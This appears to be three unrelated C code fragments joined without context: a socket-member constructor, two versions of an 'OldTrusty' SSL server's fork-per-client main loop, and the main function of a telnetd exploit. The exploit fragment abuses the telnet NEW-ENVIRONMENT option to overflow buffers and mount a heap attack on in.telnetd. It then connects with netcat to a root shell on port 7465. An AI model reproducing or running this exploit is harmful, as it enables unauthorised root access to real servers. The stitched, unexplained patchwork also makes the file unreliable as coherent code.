NetwMemb::NetwMemb(int recv_ip, int send_ip, int port, int init_role){ //Create socket, conside using this-> bind_addr.sin_family = AF_INET; bind_addr.sin_port = htons(port); bind_addr.sin_addr.s_addr = htonl(recv_ip); sock_setup(); //Store sender send_addr.sin_family = AF_INET; send_addr.sin_port = htons(port); send_addr.sin_addr.s_addr = htonl(send_ip); role = init_role; }
int main(int argc , char *argv[]) { int sfd; char *P_num; SSL_CTX * ctx; struct sockaddr_in cli_addr; socklen_t len ; int cli; pid_t pid; //Innitiliaze Server if (checkFileStruct() == -1){ printf("Problem With OldTrusty File Structure\n"); exit(1); } //Initialize SSL if (argc != 2) { printf("Usage %s <portNUMBER> \n" , argv[0]); exit(1); } P_num = argv[1]; //Set Port ctx = InitSSL(); load_Certs(ctx, "OldTrusty/ServerCerts/mycert.pem", "OldTrusty/ServerCerts/mycert.pem"); //ALL IN ONE ? //Get A regular tcp socket. already bound and listening. sfd = sock_setup(P_num); printf("OldTrusty Awaiting Connections on Port: %s\n" , P_num); //***********************************MAIN ACCEPT LOOP STARTS HERE *****************************/ for(;;) { //Ever ?? len = sizeof(cli_addr); cli = accept(sfd, (struct sockaddr *)&cli_addr, &len); if (cli == -1) { perror("accept"); continue; } printf("OLDTRUSTY RECIEVED A Connection from: %s:%d\n",inet_ntoa(cli_addr.sin_addr), ntohs(cli_addr.sin_port)); SSL *ssl; if ( ( pid = fork()) == 0 ){ //WE ARE THE CHILD close(sfd); //Child doesnt need listner //Layer SSL Over Client Socket ssl = SSL_new(ctx); SSL_set_fd(ssl, cli); //HANDSHAKE.. if ( SSL_accept(ssl) == -1) ERR_print_errors_fp(stderr); //CREATE BIO OBJECT FOR THE SSL ?? TODO TO US OpenSSL over other channels (not just socketS) //TODO //Show Client Certs (If any) // CAN ADDif require client auth then -- check_cert(ssl,client ) //for now jsut show client certs if has any ShowCerts(ssl); // Here is a connection to the client do_clients_bidding(ssl); SSL_free(ssl); close(cli); exit(0); // kill child. } close(cli); //Parent closes connected socket (Being Handled in child) } ///***END MAIN ACCEPT LOOP *****// SSL_CTX_free(ctx); //release context TODO never get hear?? graceful shutdown of server? return 0; }
int main(int argc , char *argv[]) { int sfd; char *P_num; SSL_CTX * ctx; struct sockaddr_in cli_addr; socklen_t len ; int cli; pid_t pid; struct sigaction sa; //Innitiliaze Server if (checkFileStruct() == -1){ printf("Server: Problem With OldTrusty File Structure\n"); exit(1); } //Initialize the Vouch Structure initVouchStruct(); //Initialize SSL if (argc != 2) { printf("Usage %s <portNUMBER> \n" , argv[0]); exit(1); } P_num = argv[1]; //Set Port ctx = InitSSL(); load_Certs(ctx, "OldTrusty/ServerCerts/server.crt", "OldTrusty/ServerCerts/server.key"); //ALL IN ONE ? //Get A regular tcp socket. already bound and listening. sfd = sock_setup(P_num); sa.sa_handler = sigchld_handler; // reap all dead processes sigemptyset(&sa.sa_mask); sa.sa_flags = SA_RESTART; if (sigaction(SIGCHLD, &sa, NULL) == -1) { perror("sigaction"); exit(1); } printf("Server: OldTrusty Awaiting Connections on Port: %s\n" , P_num); //***********************************MAIN ACCEPT LOOP STARTS HERE *****************************/ for(;;) { len = sizeof(cli_addr); cli = accept(sfd, (struct sockaddr *)&cli_addr, &len); if (cli == -1) { perror("accept"); continue; } printf("Server: OLDTRUSTY recieved A Connection from: %s:%d\n",inet_ntoa(cli_addr.sin_addr), ntohs(cli_addr.sin_port)); SSL *ssl; if ( ( pid = fork()) == 0 ){ //WE ARE THE CHILD close(sfd); //Child doesnt need listner //Layer SSL Over Client Socket ssl = SSL_new(ctx); SSL_set_fd(ssl, cli); //HANDSHAKE.. if ( SSL_accept(ssl) == -1) ERR_print_errors_fp(stderr); //Show Client Certs (If any) // CAN ADDif require client auth then //for now jsut show client certs if has any ShowCerts(ssl); // Here is a connection to the client do_clients_bidding(ssl); SSL_free(ssl); close(cli); exit(0); // kill child. } close(cli); //Parent closes connected socket (Being Handled in child) } ///***END MAIN ACCEPT LOOP *****// SSL_CTX_free(ctx); //release context TODO never get hear?? graceful shutdown of server? return 0; }
main (int argc, char *argv[]) { int br, l, dosleep = 0; int percent = 0; char spin; unsigned char w; bzero (oldenv, sizeof (oldenv)); argv++; dalen = strlen ("clarity.local"); while (argv[0]) { if (!strcmp (argv[0], "--pause")) dosleep = 1; if (!strcmp (argv[0], "--size") && argv[1]) { mipl = atoi (argv[1]); argv++; } if (!strcmp (argv[0], "--name") && argv[1]) { dalen = strlen (argv[1]); argv++; } argv++; } fprintf (stderr, " o MiPl of %4d o NameLen of %2d\n", mipl, dalen); if(dalen%3==0) { offsets=offset3; } else { ninbufoffset = mipl % 8192; offsets[11] += 32 * (mipl - ninbufoffset) / 8192; if (offsets[11] > 255) { fprintf (stderr, " ! MiPl too big.", mipl, dalen); exit (1); } } sock_setup (); if (dosleep) { system ("sleep 1;ps aux|grep in.telnetd|grep -v grep"); sleep (8); } dalen += strlen ("\r\n[ : yes]\r\n"); fprintf (stderr, "o Sending IAC WILL NEW-ENVIRONMENT...\n"); fflush (stderr); doo (5); will (39); fflush (dasock); read_sock (); fprintf (stderr, "o Setting up environment vars...\n"); fflush (stderr); will (1); push_clean (); doenv ("USER", "zen-parse"); doenv ("TERM", "zen-parse"); will (39); fflush (dasock); fprintf (stderr, "o Doing overflows...\n"); fflush (stderr); for (br = 0; (offsets[br] || offsets[br + 1]); br += 2) { fill (mipl + ENV + offsets[br], offsets[br + 1]); fflush (dasock); usleep (100000); read_sock (); } fprintf (stderr, "o Overflows done...\n"); fflush (stderr); push_clean (); fprintf (stderr, "o Sending IACs to start login process...\n"); fflush (stderr); wont (24); wont (32); wont (35); fprintf (dasock, "%s", tosend); will (1); push_heap_attack (); sleep (1); fprintf (stderr, "o Attempting to lauch netcat to localhost rootshell\n"); execlp ("nc", "nc", "-v", "localhost", "7465", 0); fprintf (stderr, "o If the exploit worked, there should be an open port on 7465.\n"); fprintf (stderr, " It is a root shell. You should probably close it.\n"); fflush (stderr); sleep (60); exit (0); }